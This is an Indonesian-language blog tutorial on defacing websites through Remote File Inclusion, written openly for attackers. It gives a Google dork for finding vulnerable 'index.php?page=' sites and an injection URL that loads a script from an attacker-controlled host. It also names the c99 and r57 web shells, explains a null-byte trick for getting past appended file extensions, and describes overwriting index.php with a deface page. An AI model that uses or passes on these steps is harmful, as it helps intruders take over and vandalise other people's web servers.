Home » , , , , » CARA DEFACE WEBSITE MENGGUNAKAN FILE REMOTE INCLUSION [RFI]

CARA DEFACE WEBSITE MENGGUNAKAN FILE REMOTE INCLUSION [RFI]

CARA DEFACE WEBSITE MENGGUNAKAN FILE REMOTE INCLUSION [RFI]





Remote File Inclusion (RFI) adalah teknik yang memungkinkan penyerang mengunggah kode atau file berbahaya di situs web atau server. Kerentanan mengeksploitasi berbagai jenis pemeriksaan validasi di situs web dan dapat menyebabkan eksekusi kode pada eksekusi server atau kode di situs web. Kali ini, saya akan menulis tutorial sederhana tentang Remote File Inclusion dan pada akhir tutorial, saya kira Anda akan tahu apa masalahnya dan mungkin bisa menyebarkan serangan.

RFI adalah kerentanan umum. Semua hacking situs web tidak tepat tentang injeksi SQL. Menggunakan RFI Anda dapat benar-benar merusak situs web, mendapatkan akses ke server dan bermain hampir semua hal dengan server. Mengapa memberi peringatan merah ke situs web, hanya karena itu Anda hanya perlu memiliki akal sehat dan pengetahuan dasar tentang PHP untuk mengeksekusi kode berbahaya. BASH mungkin berguna karena sebagian besar server saat ini di-host di Linux.

Jadi, BAGAIMANA CARA HACK SERVER atau WBSITE DEngan rfi?


  • Pertama-tama kita perlu mencari tahu situs rawan RFI. Mari kita lihat bagaimana kita bisa menemukannya.


Seperti yang kita tahu menemukan kerentanan adalah langkah pertama untuk hack sebuah website atau server. Jadi, mari kita mulai dan cukup pergi ke Google dan mencari kueri berikut (Dork).

inurl: “index.php?page=home”
Di tempat home, Anda juga bisa mencoba beberapa halaman lain seperti product, gallery dan lain-lain.

Jika Anda sudah mengetahui situs rawan RFI (vuln), maka Anda tidak perlu menemukannya melalui Google.

Begitu kita menemukannya, mari kita lanjutkan ke langkah selanjutnya. Mari kita lihat ada situs rawan RFI berikut.

http://target.com/index.php?page=home
Seperti yang bisa Anda lihat, website ini menarik dokumen yang tersimpan dalam format teks dari server dan menjadikannya sebagai halaman web. Sekarang kita bisa menggunakan PHP termasuk fungsinya untuk menariknya keluar. Mari kita lihat bagaimana cara kerjanya
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt

Saya telah menyertakan URL txt kode jahat saya di tempat asal. Anda bisa menggunakan shell untuk maliciousScript seperti c99, r57 atau lainnya. Nah, kalau itu situs yang benar-benar rentan, maka akan ada 3 hal yang bisa terjadi.

  1. Anda mungkin telah memperhatikan bahwa url yang terdiri dari "page = home" tidak memiliki ekstensi, namun saya menyertakan ekstensi di URL saya, maka situs tersebut mungkin memberi kesalahan seperti 'kegagalan menyertakan maliciousScript.txt', ini mungkin terjadi sebagai situs mungkin secara otomatis menambahkan ekstensi txt ke halaman yang tersimpan di server.
  2. Dalam kasus ini, secara otomatis menambahkan sesuatu di baris .php maka kita harus menggunakan byte nol '% 00' untuk menghindari kesalahan.
  3. EKSEKUSI BERHASIL
WORK!!!

Seiring kita berhasil mengeksekusi kode, kita bisa pergi dengan cangkangnya. Sekarang kita akan mencari shell untuk index.php. Dan akan mengganti file tersebut dengan halaman deface kita.









Thanks for reading & sharing BELAJAR DIKACANGIN

Previous
« Prev Post

0 comments:

Post a Comment

iklan

donation

Donation
Donation For Aray Nctrl

Contact Form

Name

Email *

Message *